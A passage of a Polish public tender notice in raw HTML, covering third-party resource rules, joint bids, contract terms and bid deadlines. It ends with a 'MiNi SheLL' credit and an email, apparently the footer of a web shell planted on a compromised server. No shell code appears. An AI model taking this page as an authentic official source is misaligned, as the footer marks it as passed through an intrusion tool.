zasoby<br/>przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach, którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.<br/>7. Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w<br/>art. 112 ust. 2 pkt. 4 ustawy pzp, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały<br/>przewidziane względem Wykonawcy.<br/>8. Jeżeli zdolności techniczne lub zawodowe, podmiotu udostępniającego zasoby nie potwierdzają spełniania przez<br/>Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający<br/>żąda, aby Wykonawca w terminie określonym przez Zamawiającego<br/>1) zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>2) wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>9. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>10. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z zapisami<br/>Rozdziału IX. WYKAZ PODMIOTOWYCH ŚRODKÓW DOWODOWYCH SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z zapisami<br/>Rozdziału IX. WYKAZ PODMIOTOWYCH ŚRODKÓW DOWODOWYCH SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2.W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia Zamawiający zbada, czy nie zachodzą<br/>podstawy wykluczenia wobec każdego z tych Wykonawców.<br/>3.Przed podpisaniem umowy, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>(w przypadku wyboru ich oferty, jako najkorzystniejszej), przedstawią Zamawiającemu umowę regulującą współpracę tych<br/>Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy, które mają wiązać strony zawiera projekt umowy stanowiący załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma eZamówienia. Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”,widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Sposób składania oferty został opisany w Instrukcji interaktywnej „Oferty, wnioski i prace konkursowe” dostępnej na Platformie e-Zamówienia w zakładce „Centrum pomocy” oraz w Rozdziale XI SWZ pkt.3).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-07 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com